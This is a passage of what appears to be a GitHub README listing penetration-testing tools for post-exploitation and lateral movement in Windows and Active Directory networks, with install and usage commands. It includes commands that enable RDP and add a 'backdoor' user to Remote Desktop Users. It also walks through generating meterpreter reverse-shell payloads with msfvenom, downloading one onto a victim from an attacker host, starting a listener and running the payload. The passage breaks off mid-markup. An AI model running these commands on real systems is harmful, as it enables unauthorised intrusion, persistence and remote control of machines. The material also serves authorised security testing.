class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Scavenger is a multi-threaded post-exploitation scanning tool for scavenging systems, finding most frequently used files and folders as well as "interesting" files containing sensitive information.</p> <p dir="auto">Scavenger confronts a challenging issue typically faced by Penetration Testing consultants during internal penetration tests; the issue of having too much access to too many systems with limited days for testing.</p> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">First install CrackMapExec from <a href="https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation">here</a>.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/SpiderLabs/scavenger cd scavenger"><pre>git clone https://github.com/SpiderLabs/scavenger <span class="pl-c1">cd</span> scavenger</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Search for interesting files on victim endpoint python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local"><pre><span class="pl-c"><span class="pl-c">#</span> Search for interesting files on victim endpoint</span> python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local</pre></div> <p dir="auto">Nice <a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/" rel="nofollow">blog post</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216736914-e7a7fe26-3531-4ae1-9962-fce130d8ab62.png"><img src="https://user-images.githubusercontent.com/100603074/216736914-e7a7fe26-3531-4ae1-9962-fce130d8ab62.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/" rel="nofollow">https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Lateral Movement</h1><a id="user-content-lateral-movement" class="anchor" aria-label="Permalink: Lateral Movement" href="#lateral-movement"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Porchetta-Industries/CrackMapExec">crackmapexec</a></h3><a id="user-content-crackmapexec" class="anchor" aria-label="Permalink: 🔙crackmapexec" href="#crackmapexec"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This is a great tool for pivoting in a Windows/Active Directory environment using credential pairs (username:password, username:hash). It also offered other features including enumerating logged on users and spidering SMB shares to executing psexec style attacks, auto-injecting Mimikatz/Shellcode/DLL’s into memory using Powershell, dumping the NTDS.dit and more.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt install crackmapexec"><pre>sudo apt install crackmapexec</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="crackmapexec smb <ip address> -d <domain> -u <user list> -p <password list>"><pre>crackmapexec smb <span class="pl-k"><</span>ip address<span class="pl-k">></span> -d <span class="pl-k"><</span>domain<span class="pl-k">></span> -u <span class="pl-k"><</span>user list<span class="pl-k">></span> -p <span class="pl-k"><</span>password list<span class="pl-k">></span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192070626-4549ec06-e2c5-477b-a97d-0f29e48bbfbc.png"><img src="https://user-images.githubusercontent.com/100603074/192070626-4549ec06-e2c5-477b-a97d-0f29e48bbfbc.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/FortyNorthSecurity/WMIOps">WMIOps</a></h3><a id="user-content-wmiops" class="anchor" aria-label="Permalink: 🔙WMIOps" href="#wmiops"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">WMIOps is a powershell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment.</p> <p dir="auto">Developed by <a href="https://twitter.com/christruncer" rel="nofollow">@christruncer</a>.</p> <p dir="auto">Original <a href="https://www.christophertruncer.com/introducing-wmi-ops/" rel="nofollow">blog post</a> documenting release.</p> <p dir="auto"><strong>Install: (PowerShell)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/FortyNorthSecurity/WMIOps Import-Module WMIOps.ps1"><pre>git clone https://github.com/FortyNorthSecurity/WMIOps Import-Module WMIOps.ps1</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Executes a user specified command on the target machine Invoke-ExecCommandWMI # Returns all running processes from the target machine Get-RunningProcessesWMI # Checks if a user is active at the desktop on the target machine (or if away from their machine) Find-ActiveUsersWMI # Lists all local and network connected drives on target system Get-SystemDrivesWMI # Executes a powershell script in memory on the target host via WMI and returns the output Invoke-RemoteScriptWithOutput"><pre><span class="pl-c"><span class="pl-c">#</span> Executes a user specified command on the target machine</span> Invoke-ExecCommandWMI <span class="pl-c"><span class="pl-c">#</span> Returns all running processes from the target machine</span> Get-RunningProcessesWMI <span class="pl-c"><span class="pl-c">#</span> Checks if a user is active at the desktop on the target machine (or if away from their machine)</span> Find-ActiveUsersWMI <span class="pl-c"><span class="pl-c">#</span> Lists all local and network connected drives on target system</span> Get-SystemDrivesWMI <span class="pl-c"><span class="pl-c">#</span> Executes a powershell script in memory on the target host via WMI and returns the output</span> Invoke-RemoteScriptWithOutput</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266302-9c098f03-24fd-4f91-af63-db2fe04c01c7.png"><img src="https://user-images.githubusercontent.com/100603074/210266302-9c098f03-24fd-4f91-af63-db2fe04c01c7.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266314-e51c7c99-1e2a-473e-926c-074b56fe79a5.png"><img src="https://user-images.githubusercontent.com/100603074/210266314-e51c7c99-1e2a-473e-926c-074b56fe79a5.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Images used from <a href="https://pentestlab.blog/2017/11/20/command-and-control-wmi/" rel="nofollow">https://pentestlab.blog/2017/11/20/command-and-control-wmi/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Mr-Un1k0d3r/PowerLessShell">PowerLessShell</a></h3><a id="user-content-powerlessshell" class="anchor" aria-label="Permalink: 🔙PowerLessShell" href="#powerlessshell"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Tool that uses MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/Mr-Un1k0d3r/PowerLessShell cd PowerLessShell"><pre>git clone https://github.com/Mr-Un1k0d3r/PowerLessShell <span class="pl-c1">cd</span> PowerLessShell</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Help python PowerLessShell.py -h # Generate PowerShell payload python PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj # Generating a shellcode payload python PowerLessShell.py -source shellcode.raw -output malicious.csproj"><pre><span class="pl-c"><span class="pl-c">#</span> Help</span> python PowerLessShell.py -h <span class="pl-c"><span class="pl-c">#</span> Generate PowerShell payload </span> python PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj <span class="pl-c"><span class="pl-c">#</span> Generating a shellcode payload</span> python PowerLessShell.py -source shellcode.raw -output malicious.csproj</pre></div> <p dir="auto">Full usage information can be found <a href="https://github.com/Mr-Un1k0d3r/PowerLessShell#usage">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266357-75a3f09d-9855-46d5-ad13-69c677b4499f.png"><img src="https://user-images.githubusercontent.com/100603074/210266357-75a3f09d-9855-46d5-ad13-69c677b4499f.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628" rel="nofollow">https://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://learn.microsoft.com/en-us/sysinternals/downloads/psexec" rel="nofollow">PsExec</a></h3><a id="user-content-psexec" class="anchor" aria-label="Permalink: 🔙PsExec" href="#psexec"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">PsExec is a part of the Sysinternals suite of tools, which is a collection of utilities for managing and troubleshooting Windows systems.</p> <p dir="auto">It is great for remotely executing commands on target machines.</p> <p dir="auto"><strong>Note:</strong> Some AVs detect PsExec as a 'remote admin' virus.</p> <p dir="auto"><strong>Install: (PowerShell)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Invoke-WebRequest -Uri 'https://download.sysinternals.com/files/PSTools.zip' -OutFile 'pstools.zip' Expand-Archive -Path 'pstools.zip' -DestinationPath "$env:TEMP\pstools" Move-Item -Path "$env:TEMP\pstools\psexec.exe" . Remove-Item -Path "$env:TEMP\pstools" -Recurse"><pre>Invoke-WebRequest -Uri <span class="pl-s"><span class="pl-pds">'</span>https://download.sysinternals.com/files/PSTools.zip<span class="pl-pds">'</span></span> -OutFile <span class="pl-s"><span class="pl-pds">'</span>pstools.zip<span class="pl-pds">'</span></span> Expand-Archive -Path <span class="pl-s"><span class="pl-pds">'</span>pstools.zip<span class="pl-pds">'</span></span> -DestinationPath <span class="pl-s"><span class="pl-pds">"</span><span class="pl-smi">$env</span>:TEMP\pstools<span class="pl-pds">"</span></span> Move-Item -Path <span class="pl-s"><span class="pl-pds">"</span><span class="pl-smi">$env</span>:TEMP\pstools\psexec.exe<span class="pl-pds">"</span></span> <span class="pl-c1">.</span> Remove-Item -Path <span class="pl-s"><span class="pl-pds">"</span><span class="pl-smi">$env</span>:TEMP\pstools<span class="pl-pds">"</span></span> -Recurse</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Prevent the license agreement from being displayed psexec.exe /accepteula # Run the 'hostname' command on remote machine psexec.exe \\REMOTECOMPUTER hostname # Run the 'hostname' command on EVERYTHING (on the domain) psexec.exe \\* hostname # Run a local executable on a remote machine psexec.exe \\REMOTECOMPUTER -c C:\Tools\program.exe # Run the 'hostname' command with different credentials psexec.exe \\REMOTECOMPUTER hostname -u localadmin -p secret-p@$$word # Spawn shell on remote machine psexec.exe -s \\REMOTECOMPUTER cmd"><pre><span class="pl-c"><span class="pl-c">#</span> Prevent the license agreement from being displayed</span> psexec.exe /accepteula <span class="pl-c"><span class="pl-c">#</span> Run the 'hostname' command on remote machine</span> psexec.exe <span class="pl-cce">\\</span>REMOTECOMPUTER hostname <span class="pl-c"><span class="pl-c">#</span> Run the 'hostname' command on EVERYTHING (on the domain)</span> psexec.exe <span class="pl-cce">\\</span><span class="pl-k">*</span> hostname <span class="pl-c"><span class="pl-c">#</span> Run a local executable on a remote machine</span> psexec.exe <span class="pl-cce">\\</span>REMOTECOMPUTER -c C:<span class="pl-cce">\T</span>ools<span class="pl-cce">\p</span>rogram.exe <span class="pl-c"><span class="pl-c">#</span> Run the 'hostname' command with different credentials</span> psexec.exe <span class="pl-cce">\\</span>REMOTECOMPUTER hostname -u localadmin -p secret-p@<span class="pl-smi">$$</span>word <span class="pl-c"><span class="pl-c">#</span> Spawn shell on remote machine</span> psexec.exe -s <span class="pl-cce">\\</span>REMOTECOMPUTER cmd</pre></div> <p dir="auto">Great <a href="https://adamtheautomator.com/psexec/" rel="nofollow">blog post</a> on PsExec usage.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266376-8daa51d6-16d4-4422-b723-d1bc8b7f22e2.png"><img src="https://user-images.githubusercontent.com/100603074/210266376-8daa51d6-16d4-4422-b723-d1bc8b7f22e2.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://adamtheautomator.com/psexec/" rel="nofollow">https://adamtheautomator.com/psexec/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/RiccardoAncarani/LiquidSnake">LiquidSnake</a></h3><a id="user-content-liquidsnake" class="anchor" aria-label="Permalink: 🔙LiquidSnake" href="#liquidsnake"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Liquid Snake is a program aimed at performing lateral movement against Windows systems without touching the disk.</p> <p dir="auto">The tool relies on WMI Event Subscription in order to execute a .NET assembly in memory, the .NET assembly will listen for a shellcode on a named pipe and then execute it using a variation of the thread hijacking shellcode injection.</p> <p dir="auto">The project is composed by two separate solutions:</p> <ul dir="auto"> <li><code>CSharpNamedPipeLoader</code> - the component that will be transformed in VBS via GadgetToJScript</li> <li><code>LiquidSnake</code> - the component responsible to creating the WMI Event Subscription on the remote system</li> </ul> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">Open both solutions in Visual Studio and build. <em>Make sure to target x64 architecture for the <code>CSharpNamedPipeLoader</code>.</em></p> <p dir="auto">Output: Two separate EXEs: <code>CSharpNamedPipeLoader.exe</code> and <code>LiquidSnake.exe</code></p> <p dir="auto">Full build information can be found <a href="https://github.com/RiccardoAncarani/LiquidSnake#building">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">Use <code>LiquidSnake.exe</code> agains a host where you have administrative access over as follows:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="LiquidSnake.exe <host> [<username> <password> <domain>] LiquidSnake.exe dc01.isengard.local LiquidSnake.exe dc01.isengard.local saruman DeathToFrodo123 isengard.local"><pre>LiquidSnake.exe <span class="pl-k"><</span>host<span class="pl-k">></span> [<span class="pl-k"><</span>username<span class="pl-k">></span> <span class="pl-k"><</span>password<span class="pl-k">></span> <span class="pl-k"><</span>domain<span class="pl-k">></span>] LiquidSnake.exe dc01.isengard.local LiquidSnake.exe dc01.isengard.local saruman DeathToFrodo123 isengard.local</pre></div> <p dir="auto">If everything went fine, you should obtain an output similar as the following:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="[*] Event filter created. [*] Event consumer created. [*] Subscription created, now sleeping [*] Sending some DCOM love.. [*] Sleeping again... long day"><pre>[<span class="pl-k">*</span>] Event filter created. [<span class="pl-k">*</span>] Event consumer created. [<span class="pl-k">*</span>] Subscription created, now sleeping [<span class="pl-k">*</span>] Sending some DCOM love.. [<span class="pl-k">*</span>] Sleeping again... long day</pre></div> <p dir="auto">General usage information can be found <a href="https://github.com/RiccardoAncarani/LiquidSnake#usage">here</a>.</p> <p dir="auto">Full <code>LiquidSnake</code> usage information can be found <a href="https://github.com/RiccardoAncarani/LiquidSnake/tree/main/LiquidSnake">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210986763-2ffe49dd-597b-4ca2-a3ad-674b5fe39624.jpg"><img src="https://user-images.githubusercontent.com/100603074/210986763-2ffe49dd-597b-4ca2-a3ad-674b5fe39624.jpg" alt="LiquidSnake" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/RiccardoAncarani/LiquidSnake#usage">https://github.com/RiccardoAncarani/LiquidSnake#usage</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Enabling RDP</h3><a id="user-content-enabling-rdp" class="anchor" aria-label="Permalink: 🔙Enabling RDP" href="#enabling-rdp"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall set rule group="remote desktop" new enable=Yes net localgroup "Remote Desktop Users" "backdoor" /add"><pre>reg add <span class="pl-s"><span class="pl-pds">"</span>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server<span class="pl-pds">"</span></span> /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall <span class="pl-c1">set</span> rule group=<span class="pl-s"><span class="pl-pds">"</span>remote desktop<span class="pl-pds">"</span></span> new enable=Yes net localgroup <span class="pl-s"><span class="pl-pds">"</span>Remote Desktop Users<span class="pl-pds">"</span></span> <span class="pl-s"><span class="pl-pds">"</span>backdoor<span class="pl-pds">"</span></span> /add</pre></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Upgrading shell to meterpreter</h3><a id="user-content-upgrading-shell-to-meterpreter" class="anchor" aria-label="Permalink: 🔙Upgrading shell to meterpreter" href="#upgrading-shell-to-meterpreter"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Shells (<a href="https://infinitelogins.com/tag/payloads/" rel="nofollow">https://infinitelogins.com/tag/payloads/</a>)</p> <p dir="auto">After getting basic shell access to an endpoint a meterpreter is nicer to continue with.</p> <p dir="auto"><strong>[attacker]</strong> Generate a meterpreter shell:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf"><pre>msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe msfvenom -p linux/x86/shell/reverse_tcp LHOST=<span class="pl-k"><</span>IP<span class="pl-k">></span> LPORT=<span class="pl-k"><</span>PORT<span class="pl-k">></span> -f elf <span class="pl-k">></span> shell-x86.elf</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/193451669-ff745cf6-e103-4f7e-a266-f7f224dfbb0a.png"><img src="https://user-images.githubusercontent.com/100603074/193451669-ff745cf6-e103-4f7e-a266-f7f224dfbb0a.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><strong>[victim]</strong> Download to victim endpoint:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"`"><pre>powershell <span class="pl-s"><span class="pl-pds">"</span>(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')<span class="pl-pds">"</span></span><span class="pl-s"><span class="pl-pds">`</span></span></pre></div> <p dir="auto"><strong>[attacker]</strong> Configure listener:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run`"><pre>use exploit/multi/handler <span class="pl-c1">set</span> PAYLOAD windows/meterpreter/reverse_tcp <span class="pl-c1">set</span> LHOST your-ip <span class="pl-c1">set</span> LPORT listening-port run<span class="pl-s"><span class="pl-pds">`</span></span></pre></div> <p dir="auto"><strong>[victim]</strong> Execute payload:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Start-Process "shell-name.exe"`"><pre>Start-Process <span class="pl-s"><span class="pl-pds">"</span>shell-name.exe<span class="pl-pds">"</span></span><span class="pl-s"><span class="pl-pds">`</span></span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/193452305-91b769a7-96c4-43d3-b3e2-6e31b3afec27.png"><img src="https://user-images.githubusercontent.com/100603074/193452305-91b769a7-96c4-43d3-b3e2-6e31b3afec27.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Forwarding Ports</h3><a id="user-content-forwarding-ports" class="anchor" aria-label="Permalink: 🔙Forwarding Ports" href="#forwarding-ports"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 